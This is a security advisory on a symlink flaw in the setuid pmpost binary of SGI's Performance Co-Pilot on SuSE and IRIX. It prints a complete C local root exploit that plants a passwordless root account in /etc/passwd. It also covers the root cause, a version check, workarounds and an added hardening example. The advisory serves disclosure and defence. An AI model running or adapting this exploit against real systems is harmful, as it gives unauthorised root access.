COMMAND
pmpost
SYSTEMS AFFECTED
PCP package (IRIX, SuSE Linux)
PROBLEM
Paul Starzetz found the following. There is a symlink handling
problem in the pcp suite from SGI. The binary pmpost follows
symlinks; if it is installed setuid root, this leads to an instant
root compromise, as found on SuSE 7.1.
Attached is a simple C source to demonstrate this (gcc pm.c -o pm,
then ./pm):
/********************************************************
 *                                                      *
 * pmpost local root exploit                            *
 * vulnerable: pcp <= 2.1.11-5                          *
 * by IhaQueR                                           *
 *                                                      *
 ********************************************************/
#include <stdio.h>
#include <stdlib.h>     /* srand, rand, putenv, system */
#include <time.h>       /* time */
#include <unistd.h>     /* chdir, symlink, fork, execl, _exit */
#include <sys/types.h>
#include <sys/wait.h>
#include <fcntl.h>
#include <sys/stat.h>   /* mkdir, S_IRWXU */

int main(void)
{
    const char *bin = "/usr/share/pcp/bin/pmpost";
    static char buf[512];
    static char dir[128];

    /* private scratch directory, handed to pmpost as its log directory */
    srand(time(NULL));
    sprintf(dir, "/tmp/dupa.%.8d", rand());
    if (mkdir(dir, S_IRWXU))
        _exit(2);
    if (chdir(dir))
        _exit(3);
    /* pmpost opens $PCP_LOG_DIR/NOTICES as root and follows this link */
    if (symlink("/etc/passwd", "./NOTICES"))
        _exit(4);
    /* libpcp's config lookup trusts the environment override */
    snprintf(buf, sizeof(buf) - 1, "PCP_LOG_DIR=%.500s", dir);
    if (putenv(buf))
        _exit(5);

    if (!fork()) {
        execl(bin, bin, "\nr00t::0:0:root:/root:/bin/bash", NULL);
        _exit(1);
    } else {
        waitpid(0, NULL, WUNTRACED);
        chdir("..");
        sprintf(buf, "rm -rf dupa.*");
        system(buf);
        execl("/bin/su", "/bin/su", "r00t", NULL);
    }
    return 0;
}
The pmpost binary is contained in the package "pcp", as shipped
with the distributions SuSE-7.0, 7.1 and 7.2. In the distribution
7.0, /usr/share/pcp/bin/pmpost is not installed setuid root. In
7.1 and 7.2, pmpost _is_ setuid root and therefore exploitable.
The pcp package is not installed by default in any of the
distributions.
The source in src/libpcp/src/config.c reads
    if ((p = getenv(var)) != NULL)
        val = p;
for configuration items from /etc/pcp.conf and therefore trusts the
user's input/environment. The same applies to the environment
variable PCP_CONF, which specifies the configuration file. This way
of treating user input is not acceptable for a program that runs
with privileges. The actual open(2) call in src/pmpost/pmpost.c
(near "umask(022); /* is this just paranoid? */") can't be fixed
without completely ignoring the user-supplied environment, since
open(2) can't guarantee that no path segment leading to the file is
a symlink.
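The hardening the paragraph above calls for, as an added example that is not code from the advisory or from PCP: the environment override is honoured only for unprivileged callers, and the notices file is opened component by component with openat(2) and O_NOFOLLOW, so that no path segment may be a symlink. Function names, the scratch directory and the default log directory value are assumptions.

```c
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
/* config.c's lookup, but the environment is honoured only for unprivileged callers (cf. glibc secure_getenv); a real program passes getuid() != geteuid(). */
const char *pcp_conf_value(const char *var, const char *conf_default, int privileged)
{
    const char *p = privileged ? NULL : getenv(var);
    return (p && *p) ? p : conf_default;
}

/* Open an absolute path one component at a time with openat(2)+O_NOFOLLOW so no segment may be a symlink; returns an fd or -1 with errno set (ELOOP on a link). */
int open_nofollow_path(const char *path, int flags, mode_t mode)
{
    char buf[PATH_MAX], *save;
    if (path[0] != '/' || strlen(path) >= sizeof buf) { errno = EINVAL; return -1; }
    strcpy(buf, path);
    int dfd = open("/", O_RDONLY | O_DIRECTORY | O_CLOEXEC);
    char *seg = strtok_r(buf, "/", &save);
    while (dfd >= 0 && seg) {
        char *next = strtok_r(NULL, "/", &save);   /* NULL when seg is the final component */
        int fd = next ? openat(dfd, seg, O_RDONLY | O_DIRECTORY | O_NOFOLLOW | O_CLOEXEC)
                      : openat(dfd, seg, flags | O_NOFOLLOW | O_CLOEXEC, mode);
        int saved = errno;
        close(dfd);            /* drop the parent; errno restored so a failure is reported as-is */
        errno = saved;
        dfd = fd;
        seg = next;
    }
    return dfd;
}

/* Self-check in a constructed scratch directory mirroring the advisory's layout: a NOTICES symlink must be refused with ELOOP, a real file must still open. Returns 1 if so. */
int notices_symlink_rejected(void)
{
    char tmpl[] = "/tmp/pcp-hardened-XXXXXX", dir[PATH_MAX], link[PATH_MAX], real[PATH_MAX];
    if (!mkdtemp(tmpl) || !realpath(tmpl, dir)) return 0;
    snprintf(link, sizeof link, "%s/NOTICES", dir);
    snprintf(real, sizeof real, "%s/NOTICES.real", dir);
    int wr = O_WRONLY | O_APPEND | O_CREAT;
    int ok = symlink(real, link) == 0 && open_nofollow_path(link, wr, 0644) < 0 && errno == ELOOP;
    int fd = open_nofollow_path(real, wr, 0644);      /* regular file: must succeed */
    if (fd >= 0) close(fd); else ok = 0;
    unlink(link); unlink(real); rmdir(tmpl);
    return ok;
}
```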
It's probably a very rare package under Linux, but more common
under IRIX.
With minor modifications, the above exploit yields root with the
IRIX version of PCP 2.1 running under IRIX 6.5.10. PCP 2.2 under
IRIX 6.5.11+ was not tested.
Comparing notes with Jan-Frode indicated that SGI has released
more than one version of PCP 2.1. Not all versions are vulnerable
(PCP 2.1 under 6.5.6m was not). One way to check whether you're
vulnerable is to run:
    strings /usr/pcp/bin/pmpost | grep PCP_LOG_DIR
SOLUTION
As a temporary or permanent workaround for SuSE, remove the
setuid bits from the two programs /usr/share/pcp/bin/pmpost and
/usr/share/pcp/bin/pmkstat by using the following command (as
root):
    chmod a-s /usr/share/pcp/bin/*
A change to /etc/permissions* is not necessary because the two
binaries are not listed there. Users of the package might want
to change ownerships to make the functionality of the pmpost
program available again. Alternatively, users may want to delete
the package if it is not used: rpm --nodeps -e pcp.
Performance Co-Pilot (version 2.2.1-3) is now available. This
version contains fixes for the recent security issues uncovered
against the earlier 2.2.0-18 release. Please upgrade; the new
source and binary RPMs are available from
http://oss.sgi.com/projects/pcp/download
For PCP on IRIX, a patch will be available shortly for SGI
customers.